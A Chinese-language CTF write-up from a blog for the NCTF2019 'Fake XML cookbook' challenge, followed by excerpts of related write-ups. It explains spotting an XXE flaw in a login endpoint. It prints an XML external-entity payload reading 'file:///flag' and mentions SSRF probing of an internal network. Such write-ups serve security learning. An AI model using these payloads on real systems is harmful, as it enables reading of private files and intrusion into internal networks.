[NCTF2019]Fake XML cookbook

最新推荐文章于 2024-05-10 12:02:09 发布
最新推荐文章于 2024-05-10 12:02:09 发布
阅读量2k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/105913611
版权

在这里插入图片描述
sql注入不行,看看源代码,将提交的数据放到了doLogin.php下
在这里插入图片描述
看到题目名字XML,XXE漏洞
XXE漏洞讲解
根据上面文章的例子,构造出paylaod
利用这个paylaod进行任意本地文件读取(读取flag)

打ctf打多了找flag基本上在根目录或者/var/www/html/下。
直接读取根目录下的flag

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY penson SYSTEM "file:///flag" >
]>
<user><username>&penson;</username><password>penson</password></user>

在这里插入图片描述

penson by 小乌
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【BUUCTF】[NCTF2019]Fake XML cookbook
aoao331198的博客
04-30 299
bp抓包观察,username和password是以xml文件形式post的 学习从XML相关一步一步到XXE漏洞 用最基本的XXE攻击 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a [ <!ENTITY user SYSTEM "file:///flag"> ]> <user><username>&user;</username><password>123&
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解)
小宇的web博客
02-18 4263
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解) 这里先看题 乍一看像是sql注入,但是题目提示了是xml,这里就不考虑sql注入了。 先抓包看一下 这里的X-Requested-With提示了XML 然后发送到了doLogin.php 这里先讲一下XML的相关知识 XXE的危害和SSRF的有点像 XXE=>XML外部实体注入(被各种后端脚本调用) XML=>像html,html的目的是显示数据,但是xml的目的是传输数据,他没有预定义,他是纯文本,他是不会
5月10日学习记录
weixin_74020633的博客
05-10 712
这题是关于xxe漏洞的实际应用,利用xxe漏洞的外部实体来进行ssrf探针内网的主机和[NCTF2019]Fake XML cookbook的区别就在于xxe漏洞的利用方向,一个是命令执行,一个是SSRF看题,打开环境,熟悉的登录框正常的抓包进行分析,明显的xxe漏洞开始构造,先查看xxe漏洞能不能正常利用存在xxe漏洞并且能够正常利用,我在做题时想的是直接查看flag文件报错了,说明flag这个文件不存在,也许我们在外网不能正常访问,xxe的漏洞利用就可以探针内网,尝试访问内网看看。
[NCTF2019]Fake XML cookbook 1
shinygod的博客
03-13 1974
知识点:XML实体注入漏洞(XXE) 原理:XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 详细了解 查看源代码,访问doLogin.php 访问doLogin.php,提示加载外部xml实体 DOCTYPE(文档类型定义的声明) ENTITY(实体的声明) SYSTEM、PU
[NCTF2019]Fake XML cookbook(特详解)
热门推荐
qq_74806534的博客
01-30 2万+
攻击者可以通过构造恶意的 XML 文档将其发送到应用程序中,在解析该文档时,XML 解析器会加载外部实体(如文件、URL等),以便在文档中引用它们。PHP 默认使用 libxml 来解析 XML,但是从 libxml 2.9.0 开始,它默认不再解析外部实体,导致 PHP 下的 XXE 漏洞已经逐渐消失,除非你指定 LIBLXML_NOENT 去开启外部实体解析,才会存在 XXE 漏洞。4.在成功回调函数中,根据返回的 XML 数据解析出登录结果的代码和消息,然后根据不同的结果更新页面上的提示信息。
BUUCTF[NCTF2019]Fake XML cookbook
qq_62078839的博客
03-30 225
打开发现一个登录窗口,尝试常见的admin密码登录不超过,直接BP抓包 发现username和password是xml格式 尝试XML外部实体注入 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user><username>&admin;</userna...
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛是一项旨在推动我国高校电子信息类专业教学改革,提高学生动手能力和工程实践能力的重要赛事。这个.7z压缩包文件包含了自大赛创办以来,从第一届到第十四届的所有竞赛题目,对于参赛学生、...
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
BUUCTF [NCTF2019] Fake XML cookbook
Senimo
01-03 784
[NCTF2019]Fake XML cookbook 考点: 启动环境: 由题目提示,猜测为XXE漏洞。 首先尝试登陆: 使用BurpSuite抓取数据包: 看到了其中的XML代码: <user><username>admin</username><password>admin</password></user> 查看网页源码: <script type='text/javascript'> function d
BUUCTF:[NCTF2019]Fake XML cookbook
qq_46230755的博客
12-18 504
说在前面 这题的考点是XXE攻击 https://xz.aliyun.com/t/6887 这里很详细讲了什么是XXE 打开来后的页面是这样的,我们试着用admin和123456进行输入,然后抓个包 里面存在一个XML实体,我们可以构造恶意实体,读取flag <!DOCTYPE ANY [ <!ENTITY test SYSTEM "file:///flag"> ]> <user><username>&test;</username.
buuctf-Fake XML cookbook
m0_62094846的博客
04-06 317
抓包后看它的传参格式有点像xss,但是尝试过没有回显,看别人的wp,是xxe,也是和html有关 直接粘贴别人的payload,然后分析学习下 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY c SYSTEM "file:///flag"> ]> <user><username>&c;</username><passwor...
2020/7/10 -[NCTF2019]Fake XML cookbook - xxe/最简单的外部实体注入
抒情诗
07-10 382
这是最简单的外部实体注入了,只需要增加一点就行了 文章目录1.burp拦截后直接注入2.使用下面的payload直接cat /flag 1.burp拦截后直接注入 POST /doLogin.php HTTP/1.1 Host: 26242ca5-5403-4513-8ab4-39f7d6161116.node3.buuoj.cn User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept:
【学习笔记 46】 buu [NCTF2019]Fake XML cookbook
weixin_43553654的博客
08-03 340
0x00 知识点 XXE攻击 0x01 知识点详解 什么是XXE攻击? 答: XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 这里有一篇大佬的博客可以学习学习 0x02 解题思路
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值